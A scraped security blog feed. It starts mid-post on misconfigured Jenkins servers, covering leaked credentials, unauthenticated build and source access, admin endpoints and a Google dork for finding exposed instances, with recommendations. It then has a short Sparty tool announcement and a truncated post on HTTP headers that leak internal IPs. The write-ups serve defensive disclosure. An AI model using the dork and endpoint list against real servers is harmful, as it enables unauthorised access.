Builds Information and Source Codes:</span></b><span style="font-size: 11pt; line-height: 115%;"> It is possible to gain
information about the software builds without any authentication (misconfigured
scenarios). Information about the
changes in the software over a passage of time reveals information about the
development flow of the components. Jenkins application does not ask for any
explicit permission from the administrators to validate the user before
accessing the ongoing software builds. An
example is shown below:</span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: "Times New Roman","serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: "Times New Roman"; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-fareast;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUYi76npP6VZEK3u_iqEbMGDJ4d50OKV8mAQWkf9LXmVD_uMlRgUMVKk55zoBU9QzQWUH6MaVp5akapQGHqejuNghtt8ifkkCPz693doP3hOVNUXUygFqd0B6t5BapJ2a2HIxRWw/s1600/jenkins_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUYi76npP6VZEK3u_iqEbMGDJ4d50OKV8mAQWkf9LXmVD_uMlRgUMVKk55zoBU9QzQWUH6MaVp5akapQGHqejuNghtt8ifkkCPz693doP3hOVNUXUygFqd0B6t5BapJ2a2HIxRWw/s1600/jenkins_2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Exposed Software Build and Version numbers !</b></td></tr>
</tbody></table>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">In
certain scenarios, it is also possible to download the source code from the
Jenkins without any authentication. Although for making changes to the code,
you require credentials but the fun part is you can download code without them.
Take a look at the example shown below:</span><span style="font-family: Times New Roman, serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Times New Roman","serif";"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2tzpxKMx43se_bmrh3-61uLUWjsglcqMFDb4Xw2gaXewvZs9YUZ2WsFs3cwf40JfPblnDROGslZx_uouuZT-C9nOtILvBeE49mjZKCTkN9Im2p4cAKBNbzosB3JYDeW7j-phQug/s1600/jenkins_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2tzpxKMx43se_bmrh3-61uLUWjsglcqMFDb4Xw2gaXewvZs9YUZ2WsFs3cwf40JfPblnDROGslZx_uouuZT-C9nOtILvBeE49mjZKCTkN9Im2p4cAKBNbzosB3JYDeW7j-phQug/s1600/jenkins_3.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Source Code Files !</b></td></tr>
</tbody></table>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">Server-side Information Disclosure in Environment Variables: </span></b><span style="font-size: 11pt; line-height: 115%;">Access
to environment variables also provides plethora of information. Example
presented below shows the significant information about the configure MySQL
(JDBC) database server. The attacker can easily glean username and password of
the database (SONAR_JDBC_USERNAME & SONAR_JDBC_PASSWORD) including the
internal IP address with port number on which JDBC service is running. </span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeRhRKVvrzOiwJjJCfNfRoZURDc92hAFS_jGKlPpvqJqXcpRttI7DouJPqqWbt4jCk2AwkBexJb7mEP3tMZGpzMNRq-s9b9zKHazqlcivSDkMc40HT3pUYWZpQKwew5Zl8ajPew/s1600/jenkins_4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeRhRKVvrzOiwJjJCfNfRoZURDc92hAFS_jGKlPpvqJqXcpRttI7DouJPqqWbt4jCk2AwkBexJb7mEP3tMZGpzMNRq-s9b9zKHazqlcivSDkMc40HT3pUYWZpQKwew5Zl8ajPew/s1600/jenkins_4.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Revealed Environment Information !</b></td></tr>
</tbody></table>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal">
<b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;">Exposure of Application Secret Data:</span></b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"> During analysis, it has been found that a
number of server side scripts have hard coded critical information such as
secret-keys and credentials which can be exposed when console-output operations
are performed. The underlined example shows how a secret key is extracted by
accessing the console-output. In this
example, the curl command uses a secret key to connect to a specific domain for
fetching JSON data through GET request. Once this information is exposed, the
attacker can directly perform queries with the target domain. </span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDUHrSRGFKV13ZmswKOAAHozzqRR9Q-nsUWCzMneRJvCrAa0anbti6n5ZBRdHPrXROIRYu85VdfI29z36LZ_BBmujkb6YS7nKGCuRKlquiNvTdhHpodAdbDbvjquECdAaGT64eCQ/s1600/jenkins_5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDUHrSRGFKV13ZmswKOAAHozzqRR9Q-nsUWCzMneRJvCrAa0anbti6n5ZBRdHPrXROIRYu85VdfI29z36LZ_BBmujkb6YS7nKGCuRKlquiNvTdhHpodAdbDbvjquECdAaGT64eCQ/s1600/jenkins_5.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Revealed Secret Key !</b></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">Cron Jobs Execution: </span></b><span style="font-size: 11pt; line-height: 115%;">It is also possible to start the cron jobs which
reveal plethora of information due to the usage of debugging calls. The
majority of the time cron jobs produce a heck lot of output showing the success
of running software. The example shown below presents the creation of database
by a specific cron job in one of the vulnerable Jenkins configuration. It reveals
how the table of OAUTH tokens is created and index is generated. </span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikV6DvNpQEsTctiQkbc6FAJsgd_weWY9XefjSey1Y3oJ3CbKGibj9t-O6bszRClhyFBCs64z_YuQKF7b-7Zsn_tV7G4pN2YY8o1qFusBeBZPZ6ry0VqLAP8Ogh5jR5Gip90UJ8QA/s1600/jenkins_6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikV6DvNpQEsTctiQkbc6FAJsgd_weWY9XefjSey1Y3oJ3CbKGibj9t-O6bszRClhyFBCs64z_YuQKF7b-7Zsn_tV7G4pN2YY8o1qFusBeBZPZ6ry0VqLAP8Ogh5jR5Gip90UJ8QA/s1600/jenkins_6.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Information Leakage through Cron Jobs !</b></td></tr>
</tbody></table>
<div style="margin-bottom: .0001pt; margin: 0in;">
<b><span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></b></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<b><span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">Information Disclosure in
Debug Errors:</span></span></b><span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;"> During a
quick check in certain Jenkins configurations, it has been noticed that the
Jenkins server does not handle the requests to restricted resources in a secure
manner. The attacker can perform additional steps to request access to restricted
resources to generated debug errors as shown below: </span><o:p></o:p></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mJ_1xeA_WLD_PUk1CNCK7Gjpcr09n0u_MUrk-o0CKld41rgcVymvPO2fxxJXM6ZB4y8PC2GGM0c87tiAfEf___4dWGM_vXimUAssHO1RLQgW8kth1Sx-3Pu2yEhexjfcsxNY_Q/s1600/jenkins_7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mJ_1xeA_WLD_PUk1CNCK7Gjpcr09n0u_MUrk-o0CKld41rgcVymvPO2fxxJXM6ZB4y8PC2GGM0c87tiAfEf___4dWGM_vXimUAssHO1RLQgW8kth1Sx-3Pu2yEhexjfcsxNY_Q/s1600/jenkins_7.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Information Disclosure in DEBUG Errors !</b></td></tr>
</tbody></table>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">Some of the standard requests specific to Jenkins are shown below:</span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">For
verifying whether anonymous access is allowed or not in Jenkins, the link can
be fetched as: </span><b style="font-family: Arial, Helvetica, sans-serif; text-indent: -0.25in;"><span style="font-size: 11.0pt;"><a href="http://www.example.com/pview/" style="text-indent: -0.25in;">http://www.example.com/pview/</a></span></b></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">To
retrieve the system information, the attacker can try for: </span><b style="font-family: Arial, Helvetica, sans-serif; text-indent: -0.25in;"><span style="font-size: 11.0pt;"><a href="http://www.example.com/systeminfo" style="text-indent: -0.25in;">http://www.example.com/systeminf</a></span></b></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">For
accessing the script interface (command line access), one can try for:<b> </b></span><b style="font-family: Arial, Helvetica, sans-serif; text-indent: -0.25in;"><span style="font-size: 11.0pt;"><a href="http://www.example.com/script" style="text-indent: -0.25in;">http://www.example.com/script</a></span></b></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">To
retrieve the Jenkins account signup webpage:<span class="apple-converted-space"> </span></span><b style="font-family: Arial, Helvetica, sans-serif; text-indent: -0.25in;"><span style="font-size: 11.0pt; mso-bidi-font-style: italic;"><a href="http://www.example.com/signup" style="text-indent: -0.25in;">http://www.example.com/signu</a>p</span></b></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">For
creating account, send a direct request to:</span><a href="http://www.example.com/securityRealm/createAccount%C2%A0" style="font-family: Arial, Helvetica, sans-serif;"><b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11.0pt; mso-bidi-font-style: italic;">http://www.example.com/securityRealm/createAccount</span></b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;"> </span></a></li>
</ul>
<div>
<b style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 11pt; line-height: 115%;">Explicit CSRF Protection:</span></b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"> It is always a good practice to analyze the
design of the application from security standards. Some security standards
should be deployed in the application by default. For example: - Jenkins
provides a global security option in which protection against CSRF attacks have
to be explicitly checked. If this option is not checked, the Jenkins
application fails to deploy the protection globally. During our analysis, it
has been noticed a number of Jenkins systems are running without CSRF
protection which makes them vulnerable to critical web attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDcGHe5-ZAVvrSQGCZZid_xPxZYZOtD4GkkVMVAwa_SBc8pMbJyGo3JGUCgTu378B8VexS00EQ63n3_hdd05mFCf1URQGJpHOPTluZwug0f5THXXlfwl_CRNVN0NTy6gN5yvmQg/s1600/jenkins_8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDcGHe5-ZAVvrSQGCZZid_xPxZYZOtD4GkkVMVAwa_SBc8pMbJyGo3JGUCgTu378B8VexS00EQ63n3_hdd05mFCf1URQGJpHOPTluZwug0f5THXXlfwl_CRNVN0NTy6gN5yvmQg/s1600/jenkins_8.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Explicit Security Configuration !</b></td></tr>
</tbody></table>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt; line-height: 115%;">SSH Endpoint Disclosure:</span></b><span style="font-size: 11pt; line-height: 115%;"> Jenkins implements a SSH random port feature in
which the software randomize the port selection for running SSH service.
Typically, when a client sends a GET request, Jenkins replies back with
"X-SSH-Endpoint" HTTP header which leverages the information in the
form of host: port. It means SSH service is listening on following host with
given port number. If the system is already exposed on the Internet, the
attacker can easily glean information about the port number on which SSH server
is listening. A real time example of a server running Jenkins is shown below:</span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW5-6Ie04tMvmueTaJMFTpJ5QA0wFDb_gM60yGjHhzqY2vvmCuqfY3cBLaDFR_jGHnwR4z9hpmTw9UdfcNSAKYLouyCGvJPIJyK3v76Il51dtjy8SZJapxDp2CQmt2u_LDRvFurA/s1600/jenkins_9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW5-6Ie04tMvmueTaJMFTpJ5QA0wFDb_gM60yGjHhzqY2vvmCuqfY3cBLaDFR_jGHnwR4z9hpmTw9UdfcNSAKYLouyCGvJPIJyK3v76Il51dtjy8SZJapxDp2CQmt2u_LDRvFurA/s1600/jenkins_9.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>SSH Endpoint Disclosure !</b></td></tr>
</tbody></table>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt;">This information discussed in this post only provides a glimpse of
security risks associated with the poorly administered software managing
applications. These applications can provide a potential beef for the attackers
to gain substantial amount of information about the organization and server
side environment which facilitates the additional attacks.</span></div>
<br />
<div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">For replicating the issues, trigger
Google dork as:<b> intitle: "Dashboard [Jenkins]" </b>for getting a
list of Jenkins server available on the Internet. </span><o:p></o:p></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt;">Impacts: </span></b><span style="font-size: 11pt;">As shown above, the misconfigured software management applications can have
severe impacts as discussed below:</span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">Information about developers can be used to conduct
Phishing attacks including social engineering </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-indent: -0.25in;">trickery</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;"> to launch targeted
attacks.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;"><span style="font-size: 7pt;"> </span></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">A common mistake for not enabling the CSRF
protection exposes the Jenkins environment to number of critical web
vulnerabilities such as Cross-site File uploading.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">In appropriate error handling discloses information
about the different stack traces and internal components of the software.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">Unrestricted cron jobs will result in successful
running of different builds of the software. As shown above, information
disclosed in the console output results in leakage of sensitive data such as
secret keys. The attacker can use the secret keys to attack target servers.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">Disclosure of software build information provides an
attacker with a complete knowledge of the updates and modification that have
taken place in the software. This information is beneficial for hunting
security vulnerabilities or design analysis.</span></li>
</ul>
<br />
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: 11pt;">Recommendations:</span></b></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;"><span style="font-size: 7pt;"> </span></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">For
software development and management interfaces, restrict the access completely.
It is highly recommended that the server should be configured with complete
authentication. It means no functionality of the application should be allowed
to be accessed without authentication or in a default state.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">Simply
removing the HTTP links from interfaces is not a robust way to restrict access.
The links can be fuzzed easily to gain access to hidden functionality. Deploy
security features using a global configuration.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">Standard
security protection mechanism should be enabled by default without asking any
preferences from the users or administrators.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-indent: -0.25in;">Administrator
should verify the new account creation in software like Jenkins before an
access is granted to the registered user.</span></li>
</ul>
<br />
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-size: 11pt;"><span style="font-family: Arial, Helvetica, sans-serif;">Configure Well and Be Secure!</span></span></div>
</div>
<div style="margin-bottom: .0001pt; margin: 0in;">
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; line-height: 115%;"><br /></span></div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com14tag:blogger.com,1999:blog-30098758.post-49710892129569711962013-08-04T13:47:00.000-07:002013-08-25T14:18:39.465-07:00BlackHat USA Arsenal 2013 : Sparty - A FrontPage and SharePoint Security Auditing Tool<div class="separator" style="clear: both; text-align: center;">
<a href="http://sparty.secniche.org/bh_arsenal.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="158" src="http://sparty.secniche.org/bh_arsenal.png" width="200" /></a></div>
Last week, I released the first version of Sparty tool at BlackHat USA Arsenal 2013. The tool helps the penetration testers to check standard security flaws in the deployment of FrontPage and SharePoint web software. The tool is an outcome of the security issues that have been found on the wide deployments of these web software.<br />
<br />
I had an interesting discussion with <a href="https://twitter.com/secbughunter">Tom Gallagher</a> from Microsoft who worked on the FrontPage and SharePoint security and related developments. I got very good feedback which I will incorporate in the next feature. <a href="http://gursevkalra.blogspot.com/">Gursev</a> also provided some impressive points which I will work on.<br />
<br />
Sparty is hosted here : <a href="http://sparty.secniche.org/">http://sparty.secniche.org/</a><br />
<br />
Enjoy and feel free to provide any feedback.<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-59268027011098289652013-07-17T08:03:00.000-07:002013-07-17T08:03:07.543-07:00Internal IP Address Disclosure over HTTP Protocol Channel : Information Revealing Headers !The disclosure of internal IP addresses to remote users reveals a substantial layout of the organizational network. It is highly advised that the web servers should not disclose internal IP addresses in the HTTP response headers. In a real time scenarios, this is not the case. The majority of web servers, load balancing devices and web applications disclose this information. This post simply discusses the different ways through which internal IP addresses are revealed over HTTP protocol.<br />
<br />
You can read more about HTTP 1.1 specifications and working here: <a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html">http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html</a><br />
<br />
<b>1. Location Response-Header Field: </b> This response header is basically used for redirecting the HTTP request to a new location. It results in 201 response code when resource is dynamically created during the request. The 3xx (redirection 301, 302, 303, 304, 305, 306, 307) response value shows that location is predetermined by the web server and is the preferred one.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghtA7g7XWDD6LGBV_Y4P74jW8gMbPmXZ7cuwEIfBqU-Z6ZkBiHxPXJ92fxFKYY0NFqUWePvXqikRpSgoCvMgoTmPAO8r1NliYGeMo8LS_BBpQqle78diQRFn7WJ2ZvLBvBOFuI4A/s1600/loc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghtA7g7XWDD6LGBV_Y4P74jW8gMbPmXZ7cuwEIfBqU-Z6ZkBiHxPXJ92fxFKYY0NFqUWePvXqikRpSgoCvMgoTmPAO8r1NliYGeMo8LS_BBpQqle78diQRFn7WJ2ZvLBvBOFuI4A/s640/loc.png" width="640" /></a></div>
<br />
<b>2. Content-Location:</b> Similarly, Content-Location response header also discloses the internal IP address. This header presents a location of the resource when it is accessible on a separate URI in addition to the HTTP request. There is a potential issue in IIS web servers which reveal internal IP address in Content-Location header while redirecting the browser. More details can be read here: <a href="http://www.rapid7.com/vulndb/lookup/http-iis-0065">http://www.rapid7.com/vulndb/lookup/http-iis-0065</a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyXYVXlNpoEafPMgNh7NDTnLh16zC3suCPYtvdMhxE8LLlxzkysBfBDW3kUw9nTHHDPXhuSEO0_OgFzy8sUlQfCxRo8CuIDE_1TbMo3Y3mD5wKewUU3H5PUrLVpCoBlVBiAa9X-g/s1600/cl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyXYVXlNpoEafPMgNh7NDTnLh16zC3suCPYtvdMhxE8LLlxzkysBfBDW3kUw9nTHHDPXhuSEO0_OgFzy8sUlQfCxRo8CuIDE_1TbMo3Y3mD5wKewUU3H5PUrLVpCoBlVBiAa9X-g/s640/cl.png" width="640" /></a></div>
<br />
There is a difference between in the usage of Location and Content-Location HTTP response headers. For reference, you can read this blog entry: <a href="http://www.subbu.org/blog/2008/10/location-vs-content-location">http://www.subbu.org/blog/2008/10/location-vs-content-location</a>.<br />
<br />
<b>3. Via Header Field:</b> This HTTP response is header is distributed by gateways and proxies present between the client (user agents - browsers) and the web server. The basic functionality of Via header field is to track message forwarding, avoid loops during processing and identifying protocol capabilities. Generally, this header reveals the internal IP address of the configured gateway or proxy as shown below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf-7qUO5ZMPR62CskkJuCdN7MHA_VmZL9LPPKjMFjt4oCEEpL8XrjME_CS_voALl8cjJDulbzSt1MGLx7tMhEouzYAKHOqGhC5zNayxtr6X_2kWkC7WHPwiwYaKYK6qMahTy-jNg/s1600/via.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf-7qUO5ZMPR62CskkJuCdN7MHA_VmZL9LPPKjMFjt4oCEEpL8XrjME_CS_voALl8cjJDulbzSt1MGLx7tMhEouzYAKHOqGhC5zNayxtr6X_2kWkC7WHPwiwYaKYK6qMahTy-jNg/s640/via.png" width="640" /></a></div>
<br />
<b>4. X-Cache Header:</b> This response header is thrown by transparent proxies deployed as an intermediate agent between the client and server. The idea is to simply reduce the direct load on the website by placing a copy in the cache and responding with the same when HTTP request is initiated by the client. There are other functionalities associated with transparent proxies also. The internal IP address can be revealed in two scenarios as discussed below:<br />
<br />
<b>4.1 X-Cache Miss: </b>When the transparent proxy does not have a local copy of the website or web pages requested by the client.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZohef8TzBS6r9msVeNaIHSWVmqjd_mYEQF-air_RdSZPLmUOjG-gfU4nYBWi9hYAVTXsVT75Kd2lYwz9Uqz6pla7Z5YmBAxrzMHl3rJY_h3b_XC2Nd_JKf6tpoLAh2oig44jcw/s1600/x_cache_m.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZohef8TzBS6r9msVeNaIHSWVmqjd_mYEQF-air_RdSZPLmUOjG-gfU4nYBWi9hYAVTXsVT75Kd2lYwz9Uqz6pla7Z5YmBAxrzMHl3rJY_h3b_XC2Nd_JKf6tpoLAh2oig44jcw/s640/x_cache_m.png" width="640" /></a></div>
<br />
<b>4.2 X- Cache Hit: </b> When the transparent proxy has a local copy of the website or requested web pages.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnlOdLvX7wm8h1rit29a12jASa7KYN9uPaR1lnIn7_ENUYlM2-WNKgH3x7U3yNdDdTDI_wOZmu71LA8WselNfPWvOyF1u2uMfAmuD-dOwAXotw4ZHer0gNIFnWH95T8y1afZUt9g/s1600/x_cache_h.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnlOdLvX7wm8h1rit29a12jASa7KYN9uPaR1lnIn7_ENUYlM2-WNKgH3x7U3yNdDdTDI_wOZmu71LA8WselNfPWvOyF1u2uMfAmuD-dOwAXotw4ZHer0gNIFnWH95T8y1afZUt9g/s640/x_cache_h.png" width="640" /></a></div>
<br />
You can read more about the X-Cache headers here: <a href="http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/">http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/</a><br />
<br />
<b>5. Set-Cookie Header:</b> A number of load balancing devices use Set-Cookie for setting custom content as a part of communication channel to activate the session with the backend web server. The internal IP address can also be disclosed as a part of Set-Cookie parameter. A simple example is the BIG IP devices which basically reveal the internal IP address in binary encoded form. Be default, it is the functionality of BIG IP devices to handle HTTP connection pooling based on IP addresses. In the screenshot shown below, the pool parameter holds the value of internal IP address<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIgS8-ZMswfpIFfNQPB-OFSAkcFqlUfRYvKoufOgxJUXwpYiBTrl934vH-mGUOPjUH3bHxOorfN3LQuunWe7w-89JD8Dhm-Wi7cBTD7MG9_A6mOB_LVA0WFwYCO1C_QSxP1_yANA/s1600/big.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIgS8-ZMswfpIFfNQPB-OFSAkcFqlUfRYvKoufOgxJUXwpYiBTrl934vH-mGUOPjUH3bHxOorfN3LQuunWe7w-89JD8Dhm-Wi7cBTD7MG9_A6mOB_LVA0WFwYCO1C_QSxP1_yANA/s640/big.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
In my earlier presentations (couple of years ago), I talked about extracting the IP address from the BIG IP http_pool Set-Cookie parameter. The concept is shown below.<br />
<div class="separator" style="clear: both; text-align: center;">
